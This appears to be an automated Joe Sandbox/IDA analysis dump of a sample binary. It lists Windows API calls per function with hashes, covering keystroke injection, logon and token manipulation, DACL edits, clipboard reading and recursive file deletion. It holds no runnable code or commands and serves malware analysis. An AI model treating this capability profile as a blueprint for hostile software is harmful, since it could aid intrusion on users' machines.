                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                        • String ID: @GUI_DRAGID$F
                        • API String ID: 3429851547-4164748364
                        • Opcode ID: b1a4ae149677c09b42da1ed858c3a724e6083d2cd499af01af1ddaf7835b0a93
                        • Instruction ID: 635a56c16769344b6ed71c58d50fdace3a9ca0d80c3a3391d71d4e8062b3fb7c
                        • Opcode Fuzzy Hash: b1a4ae149677c09b42da1ed858c3a724e6083d2cd499af01af1ddaf7835b0a93
                        • Instruction Fuzzy Hash: 23427C74204241EFDB25CF68CC54BEBBBE5FF89320F144629F6A9872A1D731A891CB51
                        APIs
                        • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 00A148F3
                        • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00A14908
                        • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00A14927
                        • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 00A1494B
                        • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 00A1495C
                        • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 00A1497B
                        • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 00A149AE
                        • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 00A149D4
                        • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00A14A0F
                        • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00A14A56
                        • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00A14A7E
                        • IsMenu.USER32(?), ref: 00A14A97
                        • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00A14AF2
                        • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00A14B20
                        • GetWindowLongW.USER32(?,000000F0), ref: 00A14B94
                        • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00A14BE3
                        • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00A14C82
                        • wsprintfW.USER32 ref: 00A14CAE
                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00A14CC9
                        • GetWindowTextW.USER32(?,00000000,00000001), ref: 00A14CF1
                        • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00A14D13
                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00A14D33
                        • GetWindowTextW.USER32(?,00000000,00000001), ref: 00A14D5A
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
                        • String ID: %d/%02d/%02d
                        • API String ID: 4054740463-328681919
                        • Opcode ID: 3f3c70482a31d08a0c5b7a413835be8b0e0fab2094e0c2dbe839c22aa88b55cb
                        • Instruction ID: 73feb5f7f601119932d2bf4e8647bce16137ed04541997fecf446e79b78533dc
                        • Opcode Fuzzy Hash: 3f3c70482a31d08a0c5b7a413835be8b0e0fab2094e0c2dbe839c22aa88b55cb
                        • Instruction Fuzzy Hash: 2E12E071640214ABEB248F68CC49FEE7BF9EF89720F144129F515DB2E1DB789982CB50
                        APIs
                        • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 0099F998
                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 009DF474
                        • IsIconic.USER32(00000000), ref: 009DF47D
                        • ShowWindow.USER32(00000000,00000009), ref: 009DF48A
                        • SetForegroundWindow.USER32(00000000), ref: 009DF494
                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 009DF4AA
                        • GetCurrentThreadId.KERNEL32 ref: 009DF4B1
                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 009DF4BD
                        • AttachThreadInput.USER32(?,00000000,00000001), ref: 009DF4CE
                        • AttachThreadInput.USER32(?,00000000,00000001), ref: 009DF4D6
                        • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 009DF4DE
                        • SetForegroundWindow.USER32(00000000), ref: 009DF4E1
                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 009DF4F6
                        • keybd_event.USER32(00000012,00000000), ref: 009DF501
                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 009DF50B
                        • keybd_event.USER32(00000012,00000000), ref: 009DF510
                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 009DF519
                        • keybd_event.USER32(00000012,00000000), ref: 009DF51E
                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 009DF528
                        • keybd_event.USER32(00000012,00000000), ref: 009DF52D
                        • SetForegroundWindow.USER32(00000000), ref: 009DF530
                        • AttachThreadInput.USER32(?,000000FF,00000000), ref: 009DF557
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                        • String ID: Shell_TrayWnd
                        • API String ID: 4125248594-2988720461
                        • Opcode ID: 7d0bd5185f355bfa0cdd75d60793530c5b41636e7ccba351b9a45cca5eaeffa2
                        • Instruction ID: 87072a120f8019b340394eeb7ab2ad16c776586e2d5acfe1f11d60cf25f21b83
                        • Opcode Fuzzy Hash: 7d0bd5185f355bfa0cdd75d60793530c5b41636e7ccba351b9a45cca5eaeffa2
                        • Instruction Fuzzy Hash: 30314371AC0318BBEB21ABF55C4AFBF7E6DEB44B60F108466F601E61D1C6B15D01AA60
                        APIs
                          • Part of subcall function 009E16C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 009E170D
                          • Part of subcall function 009E16C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 009E173A
                          • Part of subcall function 009E16C3: GetLastError.KERNEL32 ref: 009E174A
                        • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 009E1286
                        • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 009E12A8
                        • CloseHandle.KERNEL32(?), ref: 009E12B9
                        • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 009E12D1
                        • GetProcessWindowStation.USER32 ref: 009E12EA
                        • SetProcessWindowStation.USER32(00000000), ref: 009E12F4
                        • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 009E1310
                          • Part of subcall function 009E10BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,009E11FC), ref: 009E10D4
                          • Part of subcall function 009E10BF: CloseHandle.KERNEL32(?,?,009E11FC), ref: 009E10E9
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                        • String ID: $default$winsta0
                        • API String ID: 22674027-1027155976
                        • Opcode ID: 70d89aabb780fddb4e285e2494272fd7ab6b8cf480515bfce7957da922376ada
                        • Instruction ID: dc7e380d2164928b2077dbdd2cffd6d7a48ddbf0759e820b5d25be8f314edba2
                        • Opcode Fuzzy Hash: 70d89aabb780fddb4e285e2494272fd7ab6b8cf480515bfce7957da922376ada
                        • Instruction Fuzzy Hash: 69819A72900289ABDF22DFA5DC49FEE7BBDEF48710F148129F910A62A0D7718D45CB64
                        APIs
                          • Part of subcall function 009E10F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 009E1114
                          • Part of subcall function 009E10F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,009E0B9B,?,?,?), ref: 009E1120
                          • Part of subcall function 009E10F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,009E0B9B,?,?,?), ref: 009E112F
                          • Part of subcall function 009E10F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,009E0B9B,?,?,?), ref: 009E1136
                          • Part of subcall function 009E10F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 009E114D
                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 009E0BCC
                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 009E0C00
                        • GetLengthSid.ADVAPI32(?), ref: 009E0C17
                        • GetAce.ADVAPI32(?,00000000,?), ref: 009E0C51
                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 009E0C6D
                        • GetLengthSid.ADVAPI32(?), ref: 009E0C84
                        • GetProcessHeap.KERNEL32(00000008,00000008), ref: 009E0C8C
                        • HeapAlloc.KERNEL32(00000000), ref: 009E0C93
                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 009E0CB4
                        • CopySid.ADVAPI32(00000000), ref: 009E0CBB
                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 009E0CEA
                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 009E0D0C
                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 009E0D1E
                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 009E0D45
                        • HeapFree.KERNEL32(00000000), ref: 009E0D4C
                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 009E0D55
                        • HeapFree.KERNEL32(00000000), ref: 009E0D5C
                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 009E0D65
                        • HeapFree.KERNEL32(00000000), ref: 009E0D6C
                        • GetProcessHeap.KERNEL32(00000000,?), ref: 009E0D78
                        • HeapFree.KERNEL32(00000000), ref: 009E0D7F
                          • Part of subcall function 009E1193: GetProcessHeap.KERNEL32(00000008,009E0BB1,?,00000000,?,009E0BB1,?), ref: 009E11A1
                          • Part of subcall function 009E1193: HeapAlloc.KERNEL32(00000000,?,00000000,?,009E0BB1,?), ref: 009E11A8
                          • Part of subcall function 009E1193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,009E0BB1,?), ref: 009E11B7
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                         • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                        • String ID:
                        • API String ID: 4175595110-0
                        • Opcode ID: 4d3d81b213c5290d66130b71e43e8c469ced4a6dc4c80e4873b0e8c7901791cf
                        • Instruction ID: 8171718909273c41859ab916f21f3dabd8600995fea9b2473e31c55c8b250ad8
                        • Opcode Fuzzy Hash: 4d3d81b213c5290d66130b71e43e8c469ced4a6dc4c80e4873b0e8c7901791cf
                        • Instruction Fuzzy Hash: 1671997290025AABDF11DFE5DC44BEEBBBCBF48310F148215E954A7191D7B4AE82CB60
                        APIs
                        • OpenClipboard.USER32(00A1CC08), ref: 009FEB29
                        • IsClipboardFormatAvailable.USER32(0000000D), ref: 009FEB37
                        • GetClipboardData.USER32(0000000D), ref: 009FEB43
                        • CloseClipboard.USER32 ref: 009FEB4F
                        • GlobalLock.KERNEL32(00000000), ref: 009FEB87
                        • CloseClipboard.USER32 ref: 009FEB91
                        • GlobalUnlock.KERNEL32(00000000,00000000), ref: 009FEBBC
                        • IsClipboardFormatAvailable.USER32(00000001), ref: 009FEBC9
                        • GetClipboardData.USER32(00000001), ref: 009FEBD1
                        • GlobalLock.KERNEL32(00000000), ref: 009FEBE2
                        • GlobalUnlock.KERNEL32(00000000,?), ref: 009FEC22
                        • IsClipboardFormatAvailable.USER32(0000000F), ref: 009FEC38
                        • GetClipboardData.USER32(0000000F), ref: 009FEC44
                        • GlobalLock.KERNEL32(00000000), ref: 009FEC55
                        • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 009FEC77
                        • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 009FEC94
                        • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 009FECD2
                        • GlobalUnlock.KERNEL32(00000000,?,?), ref: 009FECF3
                        • CountClipboardFormats.USER32 ref: 009FED14
                        • CloseClipboard.USER32 ref: 009FED59
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                         • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                        • String ID:
                        • API String ID: 420908878-0
                        • Opcode ID: fad412407564933f58c26ef99709fdf29fdb71fbe68ed1c12ffb9f9e92c77db1
                        • Instruction ID: 1b1ca7b5c2df06c5254c94f4c96db57b9228eef9b8becc80ed5be88fd14a4a16
                        • Opcode Fuzzy Hash: fad412407564933f58c26ef99709fdf29fdb71fbe68ed1c12ffb9f9e92c77db1
                        • Instruction Fuzzy Hash: CB61CF34244305AFD300EF64D888FBA77A8AF84724F188559F596972B2DB31DD46CB62
                        APIs
                        • FindFirstFileW.KERNEL32(?,?), ref: 009F69BE
                        • FindClose.KERNEL32(00000000), ref: 009F6A12
                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 009F6A4E
                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 009F6A75
                          • Part of subcall function 00989CB3: _wcslen.LIBCMT ref: 00989CBD
                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 009F6AB2
                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 009F6ADF
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                         • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                        • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                        • API String ID: 3830820486-3289030164
                        • Opcode ID: 9a7995fd0c021e7a62df787a374a4fa0acefc4ff342b0310c690542db927788e
                        • Instruction ID: b5bef4f45f0b1e4ec6d40a323e403090bef8cdcf6a9ea0e955b8f60599955686
                        • Opcode Fuzzy Hash: 9a7995fd0c021e7a62df787a374a4fa0acefc4ff342b0310c690542db927788e
                        • Instruction Fuzzy Hash: 0CD14EB2508304AEC710EFA4D991EBBB7ECAF98704F04491DF589D6291EB74DA44CB62
                        APIs
                        • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 009F9663
                        • GetFileAttributesW.KERNEL32(?), ref: 009F96A1
                        • SetFileAttributesW.KERNEL32(?,?), ref: 009F96BB
                        • FindNextFileW.KERNEL32(00000000,?), ref: 009F96D3
                        • FindClose.KERNEL32(00000000), ref: 009F96DE
                        • FindFirstFileW.KERNEL32(*.*,?), ref: 009F96FA
                        • SetCurrentDirectoryW.KERNEL32(?), ref: 009F974A
                        • SetCurrentDirectoryW.KERNEL32(00A46B7C), ref: 009F9768
                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 009F9772
                        • FindClose.KERNEL32(00000000), ref: 009F977F
                        • FindClose.KERNEL32(00000000), ref: 009F978F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                         • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                        • String ID: *.*
                        • API String ID: 1409584000-438819550
                        • Opcode ID: 47fac364245d4efe0eb7c2b3e2067b468dfa7bd9c431db4124b85a9ef9b31269
                        • Instruction ID: d2afa46118386d5842fdfad62bb90abccaf32f258c4cab3bc2abbc651f8fc8d8
                        • Opcode Fuzzy Hash: 47fac364245d4efe0eb7c2b3e2067b468dfa7bd9c431db4124b85a9ef9b31269
                        • Instruction Fuzzy Hash: 6531BE3668061D7BDB10EFB4DC08BEE77ACAF49331F108556FA25E20A0EB34DA458B54
                        APIs
                        • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 009F97BE
                        • FindNextFileW.KERNEL32(00000000,?), ref: 009F9819
                        • FindClose.KERNEL32(00000000), ref: 009F9824
                        • FindFirstFileW.KERNEL32(*.*,?), ref: 009F9840
                        • SetCurrentDirectoryW.KERNEL32(?), ref: 009F9890
                        • SetCurrentDirectoryW.KERNEL32(00A46B7C), ref: 009F98AE
                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 009F98B8
                        • FindClose.KERNEL32(00000000), ref: 009F98C5
                        • FindClose.KERNEL32(00000000), ref: 009F98D5
                          • Part of subcall function 009EDAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 009EDB00
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                         • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                        • String ID: *.*
                        • API String ID: 2640511053-438819550
                        • Opcode ID: 52767a259a0767fb04b03579b77a9e7a262fd1c21e4e670a0c7570d5be5a564e
                        • Instruction ID: 5a013c9048e4385c520651e864208206b83a1f58efba9c0c15ea1501c0c44cb4
                        • Opcode Fuzzy Hash: 52767a259a0767fb04b03579b77a9e7a262fd1c21e4e670a0c7570d5be5a564e
                        • Instruction Fuzzy Hash: 9331923554061D7ADB10EFA4DC48BEE77ACAF46370F148555E924A2190DB70DE858B60
                        APIs
                        • GetLocalTime.KERNEL32(?), ref: 009F8257
                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 009F8267
                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 009F8273
                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 009F8310
                        • SetCurrentDirectoryW.KERNEL32(?), ref: 009F8324
                        • SetCurrentDirectoryW.KERNEL32(?), ref: 009F8356
                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 009F838C
                        • SetCurrentDirectoryW.KERNEL32(?), ref: 009F8395
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                         • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: CurrentDirectoryTime$File$Local$System
                        • String ID: *.*
                        • API String ID: 1464919966-438819550
                        • Opcode ID: 761b1e5316684d30f62eea72f55c2fbe523b6eb04a601e46fb821829132a9c68
                        • Instruction ID: 61f850be3772329072a25edf183e4a1bf34625926c398fdaaf2e10422500f0db
                        • Opcode Fuzzy Hash: 761b1e5316684d30f62eea72f55c2fbe523b6eb04a601e46fb821829132a9c68
                        • Instruction Fuzzy Hash: EE615BB25083499FCB10EF64C840AAFB3E8FF89714F04891DFA9997251DB35E945CB92
                        APIs
                          • Part of subcall function 00983AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00983A97,?,?,00982E7F,?,?,?,00000000), ref: 00983AC2
                          • Part of subcall function 009EE199: GetFileAttributesW.KERNEL32(?,009ECF95), ref: 009EE19A
                        • FindFirstFileW.KERNEL32(?,?), ref: 009ED122
                        • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 009ED1DD
                        • MoveFileW.KERNEL32(?,?), ref: 009ED1F0
                        • DeleteFileW.KERNEL32(?,?,?,?), ref: 009ED20D
                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 009ED237
                          • Part of subcall function 009ED29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,009ED21C,?,?), ref: 009ED2B2
                        • FindClose.KERNEL32(00000000,?,?,?), ref: 009ED253
                        • FindClose.KERNEL32(00000000), ref: 009ED264
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                         • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                        • String ID: \*.*
                        • API String ID: 1946585618-1173974218
                        • Opcode ID: d7d0c16dbc88b81ed00f1bd9278975e57200ca03eb13b82241ca5eb4563665be
                        • Instruction ID: fc0d859c3f5596cbc192058b0d86b6fba74b47f2284761bb74bc4d88b1be8e2a
                        • Opcode Fuzzy Hash: d7d0c16dbc88b81ed00f1bd9278975e57200ca03eb13b82241ca5eb4563665be
                        • Instruction Fuzzy Hash: 97613B3180614DABCF06FBE1CA52AFDB779AF95300F248165E41277291EB35AF09CB61
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                         • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                        • String ID:
                        • API String ID: 1737998785-0
                        • Opcode ID: 2b6bca281e77385d0d50c35265b66065e401f8e3a6389816bd7944d975d99326
                        • Instruction ID: 58ba85d120d0ab93a53e7052bacae95d19885df95610905466e01ea04b53c95c
                        • Opcode Fuzzy Hash: 2b6bca281e77385d0d50c35265b66065e401f8e3a6389816bd7944d975d99326
                        • Instruction Fuzzy Hash: BC419F35604611AFE310DF55E848F69BBE9FF44328F14C499E5658B6B2C735EC42CB90
                        APIs
                          • Part of subcall function 009E16C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 009E170D
                          • Part of subcall function 009E16C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 009E173A
                          • Part of subcall function 009E16C3: GetLastError.KERNEL32 ref: 009E174A
                        • ExitWindowsEx.USER32(?,00000000), ref: 009EE932
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                         • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                        • String ID: $ $@$SeShutdownPrivilege
                        • API String ID: 2234035333-3163812486
                        • Opcode ID: 64c6a279782d40f6b5dd93c58e14eb8f2793cff46f41ad7eac102bcfddc17468
                        • Instruction ID: 28f6f8959552b6f84103c68e5311d8a1a15f609e4a7be9de33ae0270154ce445
                        • Opcode Fuzzy Hash: 64c6a279782d40f6b5dd93c58e14eb8f2793cff46f41ad7eac102bcfddc17468
